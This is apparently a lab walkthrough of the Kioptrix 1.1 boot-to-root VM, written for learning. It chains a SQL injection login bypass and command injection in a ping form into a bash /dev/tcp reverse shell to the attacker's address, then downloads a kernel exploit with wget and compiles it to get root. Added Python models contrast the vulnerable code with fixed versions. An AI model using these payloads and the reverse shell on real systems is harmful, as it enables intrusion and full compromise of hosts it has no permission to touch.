Kioptrix 1.1 Walkthrough Boot-To-Root

About the Kioptrix VM Image Challenges:

The Kioptrix VM images are easy challenges. The object of the game is to acquire root access by any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.

Lab Setup

We will be using Kali Linux as our offensive OS, with both Kali and the Kioptrix VM running on VMware on the same virtual network so that the two machines can reach each other.

You can download the Kioptrix 1.1 VM from the following link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Our Kali VM has a local IP address of: 192.168.1.106

The Kioptrix 1.1 VM has a local IP address of: 192.168.1.104

Scanning & Enumeration

Let us get started with an nmap scan of the target, using version detection (-sV) and the default script set (-sC), which is what produces the ssh-hostkey, sslv2 and ssl-cert details below:

nmap -sV -sC 192.168.1.104

Note that without -p- this covers only nmap's default top 1000 TCP ports (and no UDP), so a full port sweep is worth running afterwards to make sure nothing is missed. The relevant part of the output:

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 741/udp status
|_ 100024 1 744/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2019-09-05T05:58:10+00:00; -3h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:78:54:A7 (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop

From the results we can see that the target has several ports open. Besides rpcbind/status (111) and CUPS (631), the interesting ones to test first are:

  1. SSH – 22
  2. Apache – 80/443
  3. MySQL – 3306

On port 22 we have OpenSSH 3.9p1. There is no straightforward remote exploit for this version that would give us access without credentials, so SSH is better kept as a way back onto the box once we have credentials or a shell. Two scan findings are still worth recording for the report: the server still accepts SSHv1 (protocol 1.99), and the HTTPS service on 443 accepts SSLv2 with export-grade ciphers. Neither gives us a foothold here, so let us move on to the web server.

For Apache we have both HTTP (80) and HTTPS (443). Loading the site on port 443 gives a browser warning because the self-signed certificate is expired (the scan shows it was only valid until 2010-10-08), so we will use the HTTP version instead.

We are greeted with a simple admin login panel. This is interesting: it is a custom login screen written in PHP rather than part of a known CMS, so there is no off-the-shelf exploit to look up, and our first objective is to try to bypass the login with SQL injection.

SQL Injection

The common SQL injection payloads for bypassing login screens can be tried here one by one. After some trial and error, the following username (with anything at all in the password field) worked:

admin' --

It works because the username is concatenated straight into the SQL query: the quote closes the string literal and the two dashes comment out the rest of the WHERE clause, including the password check. One caveat for MySQL, which this target runs (port 3306): the double-dash comment marker must be followed by a whitespace character, so type a trailing space after the dashes or use # as the comment marker instead.
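To make the mechanism concrete, here is a small model of the bypass in Python. It is added to this walkthrough and is not code from the original post or from the Kioptrix VM. Since the target's PHP is not shown, it assumes the usual string-concatenated query (SELECT ... WHERE username = '...' AND password = '...'), uses SQLite in place of the target's MySQL, and a constructed two-row user table. It shows what the query becomes with the admin' -- payload, that the vulnerable check accepts it without a valid password, and that the same check with bound parameters does not.

```python
"""Model of the Kioptrix 1.1 login bypass.

Added example; this is not code from the original post or from the VM.
The target's PHP source is not shown on the page, so the query shape is
an assumption: the classic
    SELECT ... FROM users WHERE username = '<user>' AND password = '<pass>'
built by string concatenation. SQLite stands in for the target's MySQL
and a small constructed user table stands in for its data.
"""
import sqlite3

# Constructed sample rows; not the VM's real accounts.
SAMPLE_USERS = [("admin", "s3cret-sample"), ("guest", "guest-sample")]


def make_db():
    """In-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query(username, password):
    """The SQL text the vulnerable handler executes: input is spliced
    into the statement, so quotes and comment markers in the input
    rewrite the statement itself."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Return the authenticated username, or None, using the
    concatenated query. With username "admin' -- " the statement becomes
        ... WHERE username = 'admin' -- ' AND password = '...'
    and everything after the -- is a comment, so the password is never
    checked. (MySQL needs a space after --; SQLite does not, but the
    payloads below keep it so they work on both.)"""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the driver sends the input as
    data, so "admin' -- " is looked up literally as a username."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user in ("admin' -- ", "' OR 1=1 -- ", "admin"):
        print(repr(user), "->", build_query(user, "wrong"))
        print("  vulnerable:", login_vulnerable(db, user, "wrong"),
              " safe:", login_safe(db, user, "wrong"))
```

Run it directly to see the three queries side by side; the ' OR 1=1 -- variant is included because it logs in as whichever row the database returns first, which is usually the admin account created first.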

After we succesfully bypassed the login in screen, we were greeted by an administrative web console, that allows us to ping computers on our local network. We can specify the IP and we get the results presented to us.

Command Injection

Running a few tests with different local IP addresses makes it clear that the submitted value is passed to an OS command, so we can test for command injection by terminating the intended command and appending one of our own. In our case we used:

192.168.1.104; pwd

The IP address satisfies the ping command, the semicolon ends it, and pwd then runs as a second command; if the input were filtered or quoted, pwd would not execute. After submitting the input it is obvious that nothing is filtered and we can run arbitrary system commands.

As the screenshot shows, after the ping output we get the output of pwd: the current working directory is the Apache document root, which is consistent with the commands running in the web server's context as the apache user (running id or whoami the same way confirms the user).
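The following Python model shows why the semicolon trick works and what the fix looks like. It is an added example, not code from the original post or from the target: the PHP behind the ping page is not shown, so it assumes the usual pattern of concatenating the submitted IP into "ping -c 3 <ip>" and handing the string to the shell. A ping parameter lets the demo substitute echo for ping so it runs without network access.

```python
"""Model of the ping-form OS command injection on Kioptrix 1.1.

Added example; not code from the original post or from the target. The
PHP behind the ping page is not shown, so the server-side pattern is an
assumption: the submitted IP is concatenated into "ping -c 3 <ip>" and
the string is handed to the shell. The `ping` parameter exists so the
demo can substitute a harmless command and run offline.
"""
import ipaddress
import subprocess


def run_ping_vulnerable(target, ping="ping -c 3"):
    """Splice user input into one shell command line, as the target does.
    The shell parses the whole line, so after ';' (or '|', '&&', '`..`',
    '$(..)') the rest of the input runs as a separate command with the
    web server's privileges."""
    command_line = ping + " " + target
    result = subprocess.run(["sh", "-c", command_line],
                            capture_output=True, text=True)
    return result.stdout


def validate_target(target):
    """Accept only a literal IPv4/IPv6 address and return it normalised.
    ipaddress.ip_address() raises ValueError for anything else, which
    covers ';', spaces, shell metacharacters, hostnames and options."""
    return str(ipaddress.ip_address(target.strip()))


def run_ping_safe(target, ping=("ping", "-c", "3")):
    """Validate, then exec an argv list: no shell is involved, so there is
    nothing left to inject into."""
    addr = validate_target(target)
    result = subprocess.run(list(ping) + [addr],
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Stand-in for ping so the demo does not need network access.
    echo = "echo ping -c 3"
    print(run_ping_vulnerable("192.168.1.104; pwd", ping=echo))
    try:
        run_ping_safe("192.168.1.104; pwd", ping=("echo", "ping", "-c", "3"))
    except ValueError as err:
        print("rejected:", err)
```

Running it prints the faked ping line followed by the working directory, exactly the behaviour seen on the target, and then the rejection from the validated version. Allow-listing the input as an address and avoiding the shell are both needed: escaping alone is easy to get wrong.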

Spawning A Reverse Shell

The next step is to get an interactive shell. Since we can already run system commands we do not need to drop a PHP web shell; instead we can use bash's built-in /dev/tcp redirection as the reverse shell, pointing it at our IP and a port of our choosing (this also sidesteps the fact that the target has no netcat installed). We will use the following command:

bash -i >& /dev/tcp/192.168.1.106/1234 0>&1

In bash, >& sends both stdout and stderr to the TCP connection opened for /dev/tcp/host/port, and 0>&1 makes that same connection stdin, so the listener both types into and reads from the shell. Note that the redirections are parsed by the shell PHP spawns to run the command (/bin/sh); on CentOS that is bash, which is why this works as-is. On a system where /bin/sh is dash the line has to be wrapped as bash -c '...'.

Before we execute the command we need to set up a Netcat listener on Kali (-n: no DNS, -v: verbose, -l: listen, -p: port):

nc -nvlp 1234

With the listener waiting on port 1234, we submit the command through the ping form.

The listener receives a connection and we get a bash shell. It announces "no job control in this shell", which is normal for a shell whose stdin is a socket rather than a terminal.

We now have a shell on the target and can begin system enumeration to support privilege escalation.

Privilege Escalation

From uname -a and /etc/redhat-release we determine that the target is CentOS 4.5 running Linux kernel 2.6.9. Our next objective is to find a local privilege escalation exploit for this kernel and distribution, and we will use searchsploit for that.

Searching with searchsploit turns up a local privilege escalation exploit that matches our system criteria (Exploit-DB entry 9542, the 9542.c used below). The next step is to copy the exploit to our working directory, transfer it to the target, and compile and run it there.

To copy the exploit over we serve our working directory with Python's SimpleHTTPServer (port 8000 by default; on a Python 3-only Kali the equivalent module is http.server) and fetch the file from the target with wget:

python -m SimpleHTTPServer

In the reverse shell we change to /tmp first, since the apache user cannot write to the document root, and then download the exploit:

wget http://192.168.1.106:8000/9542.c

Once the download completes, we compile the exploit on the target (it has gcc, so the binary is built against its own libc and kernel headers) following the compilation and usage instructions in the header of the source file, and execute it. Kernel exploits can crash the box, so take a VM snapshot first.

After compiling and executing the exploit, we finally get a root shell (id should now show uid=0)!